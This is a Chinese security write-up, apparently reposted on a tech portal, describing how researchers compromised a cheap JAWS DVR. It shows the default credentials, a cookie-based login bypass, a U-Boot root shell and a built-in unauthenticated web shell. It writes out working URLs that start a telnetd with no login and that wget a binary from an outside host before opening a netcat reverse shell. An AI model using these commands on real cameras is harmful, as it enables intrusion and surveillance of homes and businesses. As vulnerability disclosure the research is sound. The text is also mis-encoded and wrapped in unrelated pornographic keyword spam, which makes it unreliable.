精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

閉路電視探頭究竟有多不安全?

安全 終端安全
閉路電視探頭在我們的生活中無所不在。最近的調(diào)查估計(jì)全英國大概有185萬的監(jiān)控?cái)z像頭,大部分都在私人住宅。大部分的探頭都會連接到某些錄像設(shè)備,也就是數(shù)字錄像機(jī)(DVR)。

閉路電視探頭在我們的生活中無所不在。最近的調(diào)查估計(jì)全英國大概有185萬的監(jiān)控?cái)z像頭,大部分都在私人住宅。大部分的探頭都會連接到某些錄像設(shè)備,也就是數(shù)字錄像機(jī)(DVR)。

閉路電視探頭究竟有多不安全?

DVR會把多個(gè)攝像頭的錄像儲存到一個(gè)硬盤上。它們不僅能夠在屏幕上顯示圖片,大部分還能聯(lián)網(wǎng),用戶可以通過瀏覽器或者客戶端來連接。

當(dāng)然商家和戶主都會想要遠(yuǎn)程進(jìn)入DVR,DVR設(shè)備通過端口轉(zhuǎn)發(fā)連接到互聯(lián)網(wǎng),也正因?yàn)槿绱耍覀兛梢栽赟hodan上找到大量的DVR設(shè)備。

所以我們打算買個(gè)廉價(jià)的DVR,看看還會不會有更加糟糕的情況。

閉路電視探頭究竟有多不安全?

 

經(jīng)過幾小時(shí)的挖掘我們便發(fā)現(xiàn)了以下的問題:

容易被找到

這款DVR會運(yùn)行一個(gè)客戶web服務(wù)器,它的HTTP服務(wù)器頭很具標(biāo)志性:“JAWS/1.0”。在Shodan上搜索這個(gè)關(guān)鍵字我們找到44,000個(gè)設(shè)備。

閉路電視探頭究竟有多不安全?

 

弱口令問題

默認(rèn)情況下,這款設(shè)備的用戶名是admin,密碼為空。

閉路電視探頭究竟有多不安全?

 

連接電視后使用DVR的本地界面就可以更改密碼。但設(shè)備中沒有鍵盤,所以可以肯定大量的這款DVR使用的是默認(rèn)密碼。

雖然弱口令已經(jīng)是老掉牙的問題了,但是還是物聯(lián)網(wǎng)領(lǐng)域中普遍的問題。

Web驗(yàn)證繞過

首次訪問DVR的時(shí)候顯示的是index.html頁面,這個(gè)頁面可以讓你輸入用戶名密碼,驗(yàn)證成功后,你就會被重定向到view2.html。

奇怪的是,當(dāng)我們清空cookies,訪問view2.html時(shí),我們看到頁面渲染了一下,然后再把我們重定向到index.html讓我們輸密碼。

這基本上就是JavaScript客戶端驗(yàn)證的標(biāo)志了。檢查view2.js,我們發(fā)現(xiàn)是這樣的:

  1. $(document).ready(function(){  
  2. dvr_camcnt =Cookies.get(“dvr_camcnt");  
  3. dvr_usr =Cookies.get("dvr_usr");  
  4. dvr_pwd =Cookies.get("dvr_pwd");  
  5. if(dvr_camcnt ==null || dvr_usr == null || dvr_pwd == null)  
  6. {  
  7. location.href= "/index.html";  
  8. }  
  9.  

只要這三個(gè)cookie有任意值,你就可以訪問了(dvr_camcnt得是2、4、8或24)。

 

手動設(shè)置這些cookie我們就能訪問了。也就是說,我們無需知道用戶名密碼。

閉路電視探頭究竟有多不安全?

 

打開串號控制臺

雖然拿到Web界面控制已經(jīng)很好玩了,但我還要root shell。

打開機(jī)器上面的蓋子之后,我們發(fā)現(xiàn)了J18。這是個(gè)115200串口,雖然我能看到輸出,但是沒有shell,也沒地方輸入。

重啟設(shè)備后我們發(fā)現(xiàn)它使用的是uboot,這是一款非常常見的開源boot loader。按任意鍵就能中斷uboot。不過你只有一秒鐘中斷uboot,所以可能得多嘗試幾次。

我們現(xiàn)在就進(jìn)入了uboot控制臺。我們可以修改啟動參數(shù),改為單用戶模式,我們就無需密碼登陸了。

setenv bootargs ${bootargs) single
boot

現(xiàn)在DVR就進(jìn)入了單用戶模式,我們也有了root shell,我們可以做點(diǎn)猥瑣的事了。

內(nèi)置web shell

本地root shell不錯(cuò),但我還想要遠(yuǎn)程shell。

查看固件后我們發(fā)現(xiàn),大部分的功能都是在dvr_app里面的,包括web服務(wù)器。盡管web界面中有cgi-bin目錄,但我在文件服務(wù)器上沒找到這個(gè)目錄,有可能dvr_app在內(nèi)部處理了這個(gè)目錄。這樣的情況在嵌入設(shè)備中非常普遍。

對這個(gè)二進(jìn)制文件使用strings命令,就能看到cgi-bin了。而且我們還看到了其他的值,包括moo和shell。

閉路電視探頭究竟有多不安全?

 

訪問moo目錄是這么個(gè)情況:

閉路電視探頭究竟有多不安全?

 

訪問shell目錄會一直加載,但訪問shell?ps時(shí)就能看到進(jìn)程列表了:

閉路電視探頭究竟有多不安全?

 

因此我們就拿到了一個(gè)遠(yuǎn)程,并且無需認(rèn)證的shell,這個(gè)shell無法禁止,是設(shè)備里面自帶的。

無需密碼登錄Telnet

設(shè)備在23端口運(yùn)行telnet,但需要root密碼。即使我們能夠看到/etc/passwd和解密hash,我們還是拿不到密碼。

閉路電視探頭究竟有多不安全?

 

我們通過密碼破解器看看能不能拿到密碼,但這要花點(diǎn)時(shí)間。

為了解決這個(gè)問題,我們使用遠(yuǎn)程web shell開啟一個(gè)新的已經(jīng)登錄的telnet daemon:

http://192.168.3.101/shell?/usr/sbin/telnetd -l/bin/sh -p 25

現(xiàn)在我們可以登錄telnet了。

閉路電視探頭究竟有多不安全?

 

反彈shell

攻擊者可以用反彈shell讓DVR反向連接到他所控制的主機(jī)。只要用戶有出口連接,這招就很管用,這是繞過NAT和防火墻的好辦法。家庭企業(yè)和小型企業(yè)網(wǎng)絡(luò)大多不會進(jìn)行出站的過濾。

一般我們會用netcat建立反彈shell。跟其他小型嵌入式設(shè)備一樣,這款DVR使用busybox來提供發(fā)亮的shell功能。這些命令是任意的。很遺憾netcat不能用,但我們可以解決。

DVR使用的是ARM處理器。也就是說基本上不可能直接下載netcat或busybox了,我們得進(jìn)行編譯。

為嵌入式系統(tǒng)進(jìn)行編譯很尷尬的,尤其是你得要跟硬件交互的時(shí)候。還好busybox和netcat的要求不多。我們只需要為架構(gòu)創(chuàng)建靜態(tài)鏈接二進(jìn)制。這個(gè)得是要靜態(tài)鏈接的,這樣就能避免對庫的依賴。這樣會使二進(jìn)制文件變大,不過這款設(shè)備上沒有磁盤空間挺寬裕。

編譯完成后我們就拿到DVR上試試。

找一個(gè)可寫目錄。大部分的文件系統(tǒng)都是只讀的,你甚至無法更改密碼添加用戶。這畢竟是個(gè)DVR,所以我們弄了個(gè)硬盤,加載在/root/rec/a1下。

用wget下載編譯的busybox二進(jìn)制到這個(gè)目錄

把busybox設(shè)為可執(zhí)行

運(yùn)行netcat反彈shell

命令如下:

http://192.168.3.101/shell?cd /root/rec/a1 && wget%68%74%74%70%3a%2f%2f%32%31%32%2e%31%31%31%2e%34%33%2e%31%36%31%2f%62%75%73%79%62%6f%78%20 && chmod %2bx busybox&& ./busybox nc 1.2.3.4 8000 -e /bin/sh -e /bin/sh

Wget的網(wǎng)址得要經(jīng)過編碼,實(shí)際的網(wǎng)址是:

http://1.2.3.4/busybox

我們服務(wù)器上的netcat就監(jiān)聽到一個(gè)連接了,通過訪問構(gòu)造好的URL我們就可以與DVR進(jìn)行交互了。

閉路電視探頭究竟有多不安全?

 

發(fā)送截屏至硬編碼的郵箱

進(jìn)一步檢查dvr_app二進(jìn)制,我們發(fā)現(xiàn)了一些很奇怪的功能。

閉路電視探頭究竟有多不安全?

 

不知道為何,第一個(gè)攝像頭的截屏?xí)话l(fā)送到lawishere@yeah.net。

發(fā)送DVR截屏的行為嚴(yán)重威脅到了隱私。

而且奇怪的是,有人曾經(jīng)在Frank Law的GitHub頁面上報(bào)告過這一情況:

https://web.archive.org/web/20151010191622/https://github.com/lawishere/JUAN-Device/issues/1

然后他撤下了這個(gè)項(xiàng)目。

其他問題

事情到此并沒有完全結(jié)束。這款設(shè)備還有其他的問題:

如果你通過web服務(wù)器獲得了shell或者命令注入,你就沒必要提權(quán)了,你已經(jīng)是root了。

這款設(shè)備沒有CSRF保護(hù),你可以誘騙用戶點(diǎn)擊鏈接,就能以他們的身份執(zhí)行動作。

沒有帳號鎖定或者防爆破措施。你可以一直猜密碼下去,唯一的限制頻率的就是設(shè)備本身的運(yùn)行速度。

沒有HTTPS。所有通信都是以明文方式發(fā)送,可以被攔截,可以被篡改。

沒有固件升級

我們的建議

把這些設(shè)備放到互聯(lián)網(wǎng)上,你就會面臨嚴(yán)重的安全風(fēng)險(xiǎn)。如果你把web界面端口轉(zhuǎn)發(fā),你就等于讓攻擊者完全控制這個(gè)設(shè)備。然后他們還可以以此作為跳板從內(nèi)部攻擊你網(wǎng)絡(luò)中的其他設(shè)備。

責(zé)任編輯:藍(lán)雨淚 來源: FreeBuf
相關(guān)推薦

2021-10-28 11:48:17

WiFi網(wǎng)絡(luò)網(wǎng)絡(luò)安全WiFi嗅探

2020-01-14 09:40:10

網(wǎng)絡(luò)安全黑客互聯(lián)網(wǎng)

2018-08-10 14:29:53

云服務(wù)云計(jì)算操作系統(tǒng)

2011-08-25 12:51:02

2015-07-01 14:48:51

2018-01-12 20:00:58

2012-04-16 10:12:54

Java線程

2009-08-03 16:58:59

C#不安全代碼

2024-01-19 08:42:45

Java線程字符串

2020-11-03 12:32:25

影子物聯(lián)網(wǎng)物聯(lián)網(wǎng)IOT

2020-04-22 20:35:02

HashMap線程安全

2021-04-04 23:16:52

安全刷臉銀行

2023-06-01 19:24:16

2014-09-12 17:44:23

2014-04-09 09:37:29

2021-10-15 10:05:04

物聯(lián)網(wǎng)安全設(shè)備

2009-11-18 10:05:13

2010-08-16 10:01:01

2021-12-08 07:31:40

Linux安全病毒

2009-11-12 08:38:34

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號

亚洲影院免费观看| 国产一区二区三区免费观看| 亚洲社区在线观看| 青青草久久伊人| 欧美v亚洲v| 久久综合久久鬼色中文字| 国产精品久久久精品| 成人性生活毛片| 日本三级久久| 欧美亚洲一区二区在线观看| 99中文字幕在线观看| 头脑特工队2在线播放| 麻豆精品国产传媒mv男同 | 粉嫩av免费一区二区三区| 亚洲欧美综合另类| 亚洲综合专区| 亚洲午夜未满十八勿入免费观看全集| 亚洲一二区在线观看| 成人免费直播| 一区二区视频在线| 日韩欧美99| 三区在线视频| 国产91在线观看丝袜| 国产精品美女午夜av| 国产成人愉拍精品久久 | 久久综合久久综合九色| 51国产成人精品午夜福中文下载| 日批视频免费在线观看| 亚洲小说欧美另类婷婷| 日韩中文字幕视频在线观看| 亚洲第一黄色网址| 99精品中文字幕在线不卡| 欧美视频一区二区三区四区| 国产视频九色蝌蚪| 特级毛片在线| 亚洲美女一区二区三区| 亚洲精品一区二区三区樱花| 日韩一区av| 不卡的av中国片| 国产成人成网站在线播放青青| 欧美视频xxxx| 久久午夜精品| 国产91精品在线播放| 日本中文字幕网| 欧美一区国产在线| 久久久精品久久久久| 一级黄色录像毛片| 欧美一区三区| 永久免费看mv网站入口亚洲| 魔女鞋交玉足榨精调教| 另类在线视频| 日韩成人黄色av| 精品人妻人人做人人爽夜夜爽| 欧美一区二区三区婷婷| 欧美色老头old∨ideo| www.日本xxxx| 亚洲四虎影院| 欧美午夜精品免费| 日本肉体xxxx裸体xxx免费| 五月激情久久| 欧美日韩精品欧美日韩精品一| www.日日操| 成人黄页网站视频| 欧美亚洲尤物久久| 在线看免费毛片| 电影一区中文字幕| 日韩精品一区二区三区视频| 丰满少妇一区二区三区专区| 欧美久久一区二区三区| 精品日韩在线观看| 亚洲图片综合网| 伊人久久大香线蕉综合网蜜芽| 亚洲片在线资源| 欧美另类z0zx974| 欧美mv日韩| 久久最新资源网| 免费看一级一片| 亚洲麻豆av| 国产精品久久久久久久久| 一级片免费观看视频| 国内精品国产成人| 国产精品久久一区二区三区| 亚洲色图21p| 国产精品天干天干在线综合| 国产奶头好大揉着好爽视频| 国产美女情趣调教h一区二区| 午夜精品久久久| 人人干人人视频| 亚洲精品大全| 日韩av中文字幕在线| 精品人妻无码一区| 一区二区三区在线| 欧美一区第一页| 一区二区视频网| 国产精品一区二区三区乱码| 乱一区二区三区在线播放| 欧美jizz18hd性欧美| 亚洲一区二区在线免费观看视频| 精品一区二区中文字幕| 日本在线一区二区| 亚洲精品国产成人| 男女男精品视频网站| 雨宫琴音一区二区在线| 国产精品成人一区二区| 亚洲第一免费视频| 欧美激情资源网| 无码人妻少妇伦在线电影| 台湾成人免费视频| 亚洲福利视频在线| 来吧亚洲综合网| 久久婷婷久久| 国产精品日韩高清| 色开心亚洲综合| 精品久久久久久中文字幕大豆网| 久热在线视频观看| 午夜精品福利影院| 欧美成人合集magnet| 五月婷婷激情五月| 波多野洁衣一区| 青青草免费在线视频观看| 日韩天堂在线| 日韩经典一区二区三区| 欧美黑吊大战白妞| 精彩视频一区二区三区| 麻豆成人在线播放| 国产盗摄在线视频网站| 884aa四虎影成人精品一区| 精品无码人妻一区| 亚洲免费大片| 成人资源av| av黄色在线| 欧美情侣在线播放| 一区二区精品免费| 亚洲尤物精选| 好吊色欧美一区二区三区| 黄色网页在线观看| 精品视频全国免费看| 亚洲第一黄色网址| 99视频一区| 国产在线精品日韩| heyzo在线| 欧美变态tickling挠脚心| 国产97免费视频| 久久99精品国产.久久久久| 欧美一区国产一区| 欧美xxx性| 亚洲欧洲中文天堂| 麻豆精品久久久久久久99蜜桃| 91在线精品一区二区| 欧美精品一区二区三区三州| 国产精品nxnn| 亚州欧美日韩中文视频| 色婷婷在线视频| 午夜在线成人av| 女~淫辱の触手3d动漫| 久久天堂精品| 夜夜爽99久久国产综合精品女不卡 | 超碰97人人做人人爱少妇| 国产又色又爽又黄又免费| 国产精品国产自产拍在线| 亚洲免费黄色录像| 永久亚洲成a人片777777| 97人人模人人爽人人喊38tv| 欧美xxxx免费虐| 亚洲第一免费播放区| 国产女同在线观看| 91视频com| 一道本在线免费视频| 性欧美69xoxoxoxo| 成人免费视频观看视频| 成人国产电影在线观看| 亚洲男人7777| 一级久久久久久久| 亚洲制服丝袜av| 国内精品久久99人妻无码| 久久精品在线| 亚洲成年人专区| jizz国产精品| 国产精品久久久久久久久久久久久久 | 2020国产精品| 色播五月综合网| 欧美日本一区二区高清播放视频| 国产精品自拍首页| 电影亚洲精品噜噜在线观看| 久久精品国产欧美亚洲人人爽| 国产999久久久| 懂色av影视一区二区三区| 欧美丰满老妇熟乱xxxxyyy| 黄色日韩网站视频| 久久久亚洲精品无码| 不卡中文字幕| 国产精品中出一区二区三区| 日本.亚洲电影| 久久久久久久久网站| 经典三级在线| 欧美一级生活片| 日韩综合在线观看| 亚洲精品国产无天堂网2021| 久久久亚洲av波多野结衣| 免费一级欧美片在线观看| 蜜臀精品一区二区| 日韩一区二区在线| 精品一区在线播放| 国产精品3区| 日韩av电影国产| 黄色小说在线播放| 色爱av美腿丝袜综合粉嫩av| 婷婷五月综合激情| 欧美一区二区视频免费观看| 亚洲自拍一区在线观看| 中文字幕一区二区三| 久久精品一区二区免费播放| 国产精品一区二区男女羞羞无遮挡 | 1769免费视频在线观看| 亚洲新声在线观看| 免费看黄色一级视频| 91精品国产综合久久蜜臀| 久久久久在线视频| 亚洲成人综合视频| 三级av在线免费观看| 国产亚洲综合av| 538国产视频| 国产91富婆露脸刺激对白 | 成人在线视频一区二区| 久久婷五月综合| 日韩一区精品字幕| 亚洲中文字幕无码中文字| 亚洲视频日本| 午夜探花在线观看| 欧美3p在线观看| 视频在线99re| 国产一区二区三区网| 国内外成人免费视频| 91精品国产乱码久久久竹菊| 成人黄色av网站| 爱情电影网av一区二区| 国产精品网址在线| 国产电影一区二区三区爱妃记| 日韩av男人的天堂| 香蕉视频亚洲一级| 青青草精品毛片| 91av亚洲| 国产成人精品久久久| 美女100%一区| 国产成人在线播放| 亚洲天堂一区二区| 国产精品99导航| 欧美不卡高清一区二区三区| 国产v综合ⅴ日韩v欧美大片| 深夜成人影院| 国产精品美女免费看| 51一区二区三区| 国产欧美精品日韩精品| 精品国产黄a∨片高清在线| 国产精品爽黄69天堂a| 国产一区影院| 91久久精品国产91久久性色| 成人短视频软件网站大全app| 91精品国产综合久久香蕉的用户体验 | 欧美日韩黄色大片| 日韩色图在线观看| 色婷婷av一区二区三区大白胸| 成人免费一级片| 欧美精品777| 亚洲国产福利视频| 亚洲高清福利视频| 欧美理论在线观看| 中文字幕亚洲综合久久| 久久黄色美女电影| 久久久久久国产免费| 成人影院网站| 成人高h视频在线| 成人影院中文字幕| 奇米精品在线| 久久精品欧美一区| www.亚洲视频.com| 久久夜色精品| 中文字幕 欧美日韩| 成人小视频在线| xxxxx在线观看| 日韩毛片高清在线播放| 国产在线综合网| 91久久精品一区二区三| 99精品在线视频观看| 日韩成人av网址| 欧美被日视频| 欧美亚洲在线播放| 亚洲爽爆av| 精品一区在线播放| 亚洲人成免费网站| 欧美日本视频在线观看| 蜜臀国产一区二区三区在线播放| 9191在线视频| 国产日韩综合av| 久久综合亚洲色hezyo国产| 欧美性生交xxxxx久久久| 国产喷水福利在线视频| 日韩精品在线播放| 超碰porn在线| 国产成人精品免费视频| 高清一区二区三区| 综合久久国产| 久久一区中文字幕| 国产51自产区| 亚洲欧洲精品成人久久奇米网| 中文字幕精品三级久久久| 欧美精品久久99| 精品无吗乱吗av国产爱色| 久久99久久99精品免观看粉嫩| 日本欧美韩国| 精品麻豆av| 欧美韩国一区| 免费成人黄色大片| 国产欧美日韩不卡| 青青国产在线观看| 日韩一级完整毛片| 日本在线播放| 国产成人中文字幕| 欧美一性一交| 亚洲精品蜜桃久久久久久| 国产在线精品免费av| 四虎成人免费影院| 91久久精品日日躁夜夜躁欧美| 欧美一级在线免费观看| 九九久久久久99精品| 国产精品成人**免费视频| 日韩经典在线视频| 午夜一级在线看亚洲| 无码人妻一区二区三区在线| 亚洲精品日韩一| 国产又色又爽又黄又免费| 丝袜美腿亚洲一区二区| 欧美free嫩15| 日韩av电影免费播放| 久久一区二区三区四区五区 | 亚洲图片久久| 色欲av无码一区二区人妻| 99久久精品国产导航| 中文字幕一区二区三区精品| 精品久久一区二区| 性欧美猛交videos| 亚洲综合在线做性| 婷婷久久国产对白刺激五月99| 亚洲欧美日韩综合网| 国产精品久久综合| 国产成人av免费| 日韩中文综合网| 色综合久久久| 特级毛片在线免费观看| 国产在线精品一区二区| 国产三级国产精品国产国在线观看| 91精品国产欧美日韩| 国产黄大片在线观看画质优化| 成人夜晚看av| 午夜精彩国产免费不卡不顿大片| 古装做爰无遮挡三级聊斋艳谭| 亚洲激情图片小说视频| 亚洲精品成人电影| 97视频在线观看免费| 西野翔中文久久精品国产| 一本久道综合色婷婷五月| 国产欧美一区二区精品性色 | 国产成人午夜高潮毛片| 久久精品波多野结衣| 亚洲成人av资源网| 中文不卡1区2区3区| 日韩成人在线资源| 国内一区二区在线| 国产亚洲精久久久久久无码77777| 精品国产91九色蝌蚪| 欧美freesex黑人又粗又大| 欧美重口乱码一区二区| 精品影院一区二区久久久| 精品无码久久久久久久| 精品视频在线播放免| 国产精品原创视频| 国产成人艳妇aa视频在线| 久久影院视频免费| 一级成人免费视频| 久久久久久久爱| 在线成人动漫av| 三级黄色片免费观看| 欧美日韩午夜激情| 欧美激情办公室videoshd| 国产一级二级三级精品| 人人狠狠综合久久亚洲| 无码人妻精品一区二区三区夜夜嗨| 亚洲国产小视频在线观看| av在线一区不卡| 国产精品国三级国产av| 国产亚洲精品免费| 国产国语亲子伦亲子| 国产成人精品免高潮费视频| 亚洲欧洲中文字幕| 爱爱的免费视频| 日韩美女在线视频| 亚洲四虎影院| 我的公把我弄高潮了视频| 一区二区中文字幕在线| 天堂中文字幕在线|